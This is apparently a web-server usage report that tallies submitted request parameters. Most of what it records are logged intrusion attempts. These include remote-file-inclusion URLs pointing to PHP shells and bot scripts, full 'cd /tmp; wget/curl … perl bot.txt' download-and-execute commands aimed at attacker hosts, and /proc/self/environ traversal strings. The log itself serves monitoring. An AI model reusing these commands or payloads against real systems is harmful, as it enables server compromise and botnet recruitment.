Parameter GALLERY_BASEDIR
ValueAccesses
http://musicadelibreria.net/footer?? 1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.iheard.us/language/pdf_fonts/id1.txt?? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://gbdata.co.uk/images/zd1.txt???? 16
http://phamsight.com/docs/images/head?? 12
http://antigua.granada.notariado.org//includes/id1.txt? 5
http://ourchat8.110mb.com/images/moncrot1.gif? 3
http://www.wvblazers.com//administrator/components/com_virtu
emart/sql/other/c1.txt?
2
http://www.tourgaja.net/www/data/sc1?? 2
http://www.semihow.com/sh/amboard/compile/default_basic/admi
n/mydb.txt??
2
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? 2
http://210.205.6.168/~shop/zfxid1.txt? 1
http://www.ouk.co.kr//board/bbs/img/van1.txt? 1
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://musicadelibreria.net/footer?? 52
http://phamsight.com/docs/images/head?? 37
http://alandar.net/www2/log1.txt? 25
|echo "casper";echo "kae";| 15
http://www.koreadefence.net/data/shirohige/zfxid.txt?? 13
http://www.lifeuniv.com/tmp/copyright.txt?? 12
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt?? 12
http://valdes.fileave.com/scan/kil-9/idxx.txt??? 12
http://www.fileden.com/files/2009/3/30/2385100/pirates1.txt?
11
http://190.12.77.105:83/fx29id1.txt? 11
Parameter _main.php?_server[DOCUMENT_ROOT]
ValueAccesses
http://crot99.webs.com/moncrot1.gif? 1
Parameter _zb_path
ValueAccesses
http://g0tr00t.pr.vc/sh3ll/fx29id1.txt? 11
http://www.corretoresdeseguros.com.br/estatisticas/id1??? 6
http://210.205.6.168/~shop/zfxid1.txt? 6
http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? 4
http://alandar.net/www2/log1.txt? 4
http://www.whinercentral.com/modules/Neos_Chronos/modules/ma
war.txt??????
4
http://kb27.co.kr/bbs///id1.txt?? 4
http://www.telephone114.com/bbs/data/__zbSessionTMP/1.txt? 4
http://dancingforcancer.com///g466/sc1?? 3
http://www.perikritis.gr/phpBB2/admin/id1.txt?? 3
Parameter board_skin_path
ValueAccesses
http://musicadelibreria.net/footer?? 2
OTHER: 1,109
ScriptTotal Accesses
/wusage/summary/cgi.html//newspublish/include.php 1,404
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
7
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1
10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt
;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt
5
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
5
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
5
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
4
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt
4
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2
a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp-
download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167.
23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
4
Parameter list
ValueAccesses
1 9
Parameter path5Bdocroot5D
ValueAccesses
http://www.xfactor.altervista.org/php5/id.txt??? 2
Parameter path[docroot]
ValueAccesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 39
http://usuarios.arnet.com.ar/adipasqua/http? 26
http://www.rayzorowns.kit.net/id.txt??? 22
http://www.neoncomanda.kit.net/tool25.dat? 18
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 16
http://claroline.lct-net.cl/id? 16
http://www.jungo8949.co.kr/tool25.txt? 16
http://ownsirc.googlepages.com/botnet.txt? 13
http://h1.ripway.com/DiegoVirus/pbot.txt? 10
http://www.linerdata.de//modules/My_eGallery/public/www?????
?????????????????????????
9
Parameter path[docroot]http://usuarios.arnet.com.ar/adrikrasnow/rfi/bl
a.txt?
ValueAccesses
2
OTHER: 1,144
ScriptTotal Accesses
/wusage/summary/cgi.html/help.php 1,291
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
9
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
8
uname -a; id 6
cd /tmp;wget http://mensagenss.hospedagemdesite.com/bot/bot_
ao.txt;curl -O -f http://mensagenss.hospedagemdesite.com/bot
/bot_ao.txt;lynx -source http://mensagenss.hospedagemdesite.
com/bot/bot_ao.txt;lwp-rget http://mensagenss.hospedagemdesi
te.com/bot/bot_ao.txt;fetch http://mensagenss.hospedagemdesi
te.com/bot/bot_ao.txt;perl bot_ao.txt;rm -rf bot_ao.txt
3
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w
ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r
oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt.
kit.net/root.txt;perl root.txt
3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U
P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP
/spriter1.txt;perl spriter1.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot
123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt;
lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl -
O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo
x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt
2
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1.
txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt
2
id 2
Parameter css_path
ValueAccesses
http://invisionar.hostinggratisargentina.com/eth0? 47
http://ownsirc.googlepages.com/botnet.txt? 38
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 23
http://208.74.174.183/brizola.txt? 20
http://www.oslutadores.com/?id=23530 18
http://normanzito.iespana.es/http.txt?? 15
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 13
http://ownsparaficar.googlepages.com/funfo.txt? 13
http://201.37.71.117:8090/cmd.txt?? 11
http://overowns.googlepages.com/testera.txt? 11
Parameter list
ValueAccesses
1 9
OTHER: 1,033
ScriptTotal Accesses
/cgi-bin/plugins/neomail/neomail.pl 1,254
Parameters by Submitted Value
Parameter action
ValueAccesses
readmessage 114
displayheaders 40
composemessage 27
logout 6
emptytrash 4
Parameter composetype
ValueAccesses
forward 13
reply 8
replyall 3
Parameter custompage
ValueAccesses
3 5
2 1
Parameter firstmessage
ValueAccesses
1 167
31 10
61 3
60 1
151 1
91 1
121 1
30 1
Parameter folder
ValueAccesses
INBOX 160
14
SAVED 9
TRASH 7
SENT 1
Parameter headers
ValueAccesses
simple 57
Parameter message_id
ValueAccesses
cc70a53a6ce846358350235dbdad5786 12
75f33a8c1ed1d9837be353ffe9017350 8
80500558a81fd9a79fca114b0fe48b66 5
62d14cc55d03d8cac3a1bb164a24da1c 4
a5bfc665bf76143d65e79d8a1b422a54 4
bb4999647043470ec4986b7829a974fc 4
41d5eeeeb2b147a79fb81f1dd3014786 3
870a4d5e068b0df113612361bf4db405 3
cbb7fb72d5b18f4b1803e38db14d2e0e 3
fe4107fdfba6b1addfeb8d8633500764 3
Parameter sessionid
ValueAccesses
mickey-session-0.496305458554165 53
mickey-session-0.403925060368241 17
mickey-session-0.768175121936114 17
killianey-session-0.0750747035062922 15
mickey-session-0.141304360077815 15
mickey-session-0.860474512753175 10
mickey-session-0.688039203946577 10
mickey-session-0.445742682161839 9
mickey-session-0.293016888274909 7
mickey-session-0.669192745656805 7
Parameter sort
ValueAccesses
date 141
sender 28
subject 22
Parameter status
ValueAccesses
37
RO 12
R 7
U 1
OTHER: 143
ScriptTotal Accesses
/wusage/summary/cgi.html/display.php 1,223
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
14
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
12
uname -a; id 9
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
4
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
4
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
id 3
cd /tmp;rm bn.txt;wget http://garyz.110mb.com/bn.txt;fetch h
ttp://garyz.110mb.com/bn.txt;lwp-download http://garyz.110mb
.com/bn.txt;curl -O http://garyz.110mb.com/bn.txt;lynx http:
//garyz.110mb.com/bn.txt;perl bn.txt
2
cd /tmp;rm -rf fuck.txt;wget http://h1.ripway.com/renatas2/f
uck.txt;fetch http://h1.ripway.com/renatas2/fuck.txt;curl -O
http://h1.ripway.com/renatas2/fuck.txt;perl fuck.txt;rm -rf
fuck.txt
2
Parameter list
ValueAccesses
1 1
Parameter pag
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 26
19
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.tudoprosperar.kit.net/x.txt? 18
http://189.23.251.131/~tiago/new.txt? 17
http://www.capsoir.com/images/TRA.txt? 16
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 15
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 15
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 12
OTHER: 993
ScriptTotal Accesses
/wusage/weekly/2011/04/03/ 1,208
Parameters by Submitted Value
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
206
../../../../../../../../../../../../../../../proc/self/envir
on
89
..//..//..//..//..//..//..//..///proc/self/environ 80
..//..//..//..//..//..//..//..///proc/self/environ 00 53
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
50
../../../../../../../../../../..//proc/self/environ 00 35
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
31
../../../../../../../../../../../../../../..//proc/self/envi
ron
20
..//..//..//..//..//..//..//..//..//..//..//..//proc/self/en
viron
2
../../../../../../../../../../../../..//proc/self/environ 00
1
Parameter option
ValueAccesses
com_google 500
com_fabrik 64
com_jscalendar 37
com_ccnewsletter 3
Parameter view
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
26
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
11
OTHER: 0
ScriptTotal Accesses
/wusage/summary/// 1,180
Parameters by Submitted Value
Parameter APB_rp
ValueAccesses
http://jvo.dk/fuursaml/TNG//gedcom_folder/babid.txt??? 3
Parameter DIR_PREFIX
ValueAccesses
http://www.lazar.ru/manager/processors/copyright.txt? ?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.corretoresdeseguros.com.br/estatisticas/id1??? 3
Parameter GLOBALS
ValueAccesses
5
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1??? 2
http://nic.bupt.edu.cn/media/j1.txt?? 1
http://surya1.fileave.com/id.txt?? 1
http://www.c21vox.tv/id1.txt?? 1
Parameter Itemid
ValueAccesses
12 1
1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.kyokushin.hu/fx29id2.txt??? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://phamsight.com/docs/images/head?? 8
http://www.howtolisten.kr/sarangbi_bgm/id1.txt? 8
http://www.whinercentral.com/modules/Neos_Chronos/modules/ad
min/mawar.txt??????
6
http://www.howtolisten.kr/lct/lib/list/respon1.txt? 5
http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? 2
http://www.babyu.co.kr/babyubbs/id1.txt? 1
test?? 1
http://indah2.webs.com/fx29id1.txt??? 1
http://kkc.or.kr/upload/banner/maza.jpg?? 1
http://kkc.or.kr/upload/banner/ipays.jpg?? 1
Parameter _REQUEST
ValueAccesses
5
Parameter _REQUEST[Itemid]
ValueAccesses
1 5
OTHER: 1,116
ScriptTotal Accesses
/wusage/summary/cgi.html//skin/zero_vote/ask_password.php 1,179
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
Parameter dir
ValueAccesses
http://www.mta.cl/galeria2/galery.txt? 82
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
44
http://www.vsm.gov.tr/pwnd/safe.gif? 32
http://www.ar-vision.com/galery.txt? 22
http://www.burhanukum.com/images/galery.txt? 19
http://x.apescar.net/r1.jpg?? 19
http://www.gumgangfarm.com/shop/data/id.txt? 16
http://www.seventhtavern.com/images/id.txt? 15
http://www.mta.cl/galeria2/galery.txt??? 14
http://normanzito.iespana.es/http.txt?? 14
OTHER: 901
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/faqsupport/include.php 1,108
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
9
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
6
uname -a; id 5
cd /tmp;rm bn.txt;wget http://nofxd.110mb.com/bot.txt;fetch
http://nofxd.110mb.com/bot.txt;lwp-download http://nofxd.110
mb.com/bot.txt;curl -O http://nofxd.110mb.com/bot.txt;lynx h
ttp://nofxd.110mb.com/bot.txt;perl bot.txt
5
cd /tmp;wget http://spamroxx.iespana.es/atkbotnet.txt;perl a
tkbotnet.txt
5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
4
cd /tmp;wget http://www.iakh.de/oneadmin/calendar/ao.txt;cur
l -O -f http://www.iakh.de/oneadmin/calendar/ao.txt;lynx -so
urce http://www.iakh.de/oneadmin/calendar/ao.txt;lwp-rget ht
tp://www.iakh.de/oneadmin/calendar/ao.txt;fetch http://www.i
akh.de/oneadmin/calendar/ao.txtt;perl ao.txt;rm -rf ao.txt
3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
3
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
3
id 3
Parameter list
ValueAccesses
1 4
Parameter path[docroot]
ValueAccesses
http://invisionar.hostinggratisargentina.com/eth0? 43
http://www.jungo8949.co.kr/tool25.txt? 21
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? 16
http://ownsirc.googlepages.com/botnet.txt? 13
http://www.neoncomanda.kit.net/tool25.dat? 12
http://bgeunivers.free.fr/modules/AllMyGuests/tool25.dat? 12
12
http://freewebs.com/tow1337/x.txt? 11
http://zuwill.110mb.com/BotneT.txt? 10
http://www.cosmick.kit.net/ty.txt? 10
OTHER: 898
ScriptTotal Accesses
/wusage/weekly/2011/04/10/ 1,089
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
125 5
Parameter amp;option
ValueAccesses
com_gcalendar 5
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 5
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
168
../../../../../../../../../../..//proc/self/environ 00 139
..//..//..//..//..//..//..//..///proc/self/environ 00 91
../../../../../../../../../../../../../../../proc/self/envir
on
42
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
41
..//..//..//..//..//..//..//..///proc/self/environ 28
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../
/proc/self/environ
5
..//..//..//..//..//..//..//..//..//..//..//..//proc/self/en
viron
4
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
4
../../../../../../../../../../../../..//proc/self/environ 00
3
Parameter custompluginfile[]
ValueAccesses
http://miyabilondon.com/mt_admin/tools/id.txt? 3
Parameter option
ValueAccesses
com_google 334
com_rokdownloads 101
com_fabrik 51
com_spsnewsletter 12
com_goole 10
com_gcalendar 10
com_ccnewsletter 9
com_product 6
Parameter view
ValueAccesses
../../../../../../../../../../../../..//proc/self/environ 00
4
OTHER: 9
ScriptTotal Accesses
/wusage/weekly/2010/11/07/ 1,087
Parameters by Submitted Value
Parameter Option
ValueAccesses
com_google 2
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 2
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 142
..//..//..//..//..//..//..//..///proc/self/environ 00 108
../../../../../../../../../../../../../../../proc/self/envir
on
88
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
51
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
40
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
40
../../../../../../../../../../../../../../..//proc/self/envi
ron
22
../../../../../../../../../../..//proc/self/environ 00 21
//..//..//..//..//..//..//..//..///proc/self/environ 00 7
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
6
Parameter option
ValueAccesses
com_google 523
com_rwcards 7
com_fabrik 5
com_goole 2
com_projects 1
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../../../../../../../../../../../../..//proc/self/envir
on 00
1
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
rwcards 6
OTHER: 7
ScriptTotal Accesses
/wusage/weekly/2011/02/06/ 1,032
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 32
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 120
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
90
..//..//..//..//..//..//..//..///proc/self/environ 00 79
../../../../../../../../../../../../../../../proc/self/envir
on
55
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
39
../../../../../../../../../../..//proc/self/environ 00 28
../../../../../../../../../../..//proc/self/environ 00 23
../../../../../../../../../../../../../../..//proc/self/envi
ron
16
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
13
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p
roc/self/environ
3
Parameter option
ValueAccesses
com_google 403
com_rokdownloads 38
com_myblog 32
com_rwcards 18
com_myfiles 6
com_gcalendar 3
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
16
../../../../../../../../../../../../..//proc/self/environ 00
5
..//..//..//..//..//..//..//..///proc/self/environ 00 5
../../../../../../../../../../../../../../../proc/self/envir
on
4
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
2
OTHER: 2
ScriptTotal Accesses
/wusage/summary/cgi.html//samplenewsletter.php 1,019
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
7
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1
10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt
;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt
4
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f
etch http://71.41.190.203/subale.txt;lwp-download http://71.
41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx
t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r
f *.txt
4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
4
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
4
uname -a; id 4
cd /tmp;rm google.txt;wget http://www.wisdom-creation.com/go
ogle.txt;fetch http://www.wisdom-creation.com/google.txt;lwp
-download http://www.wisdom-creation.com/google.txt;curl -O
http://www.wisdom-creation.com/google.txt;lynx http://www.wi
sdom-creation.com/google.txt;perl google.txt
3
cd /tmp;rm -rf tut*;wget http://inimigo.t35.com/tut.txt;lwp-
download http://inimigo.t35.com/tut.txt;fetch http://inimigo
.t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut.
txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source
http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf
tut.txt*
3
Parameter list
ValueAccesses
1 9
Parameter path[docroot]
ValueAccesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 37
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 28
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 17
http://usuarios.arnet.com.ar/larry123/ka.txt? 16
http://www.jungo8949.co.kr/tool25.txt? 12
http://h1.ripway.com/DiegoVirus/pbot.txt? 12
http://ownsirc.googlepages.com/botnet.txt? 11
http://www.neoncomanda.kit.net/tool25.dat? 11
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt
?
10
http://www.freewebs.com/yahwek/phpbot.txt? 9
OTHER: 793
ScriptTotal Accesses
/wusage/summary/cgi.html//faqsupport/samplefaqsupport.php 1,012
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
12
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
10
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
7
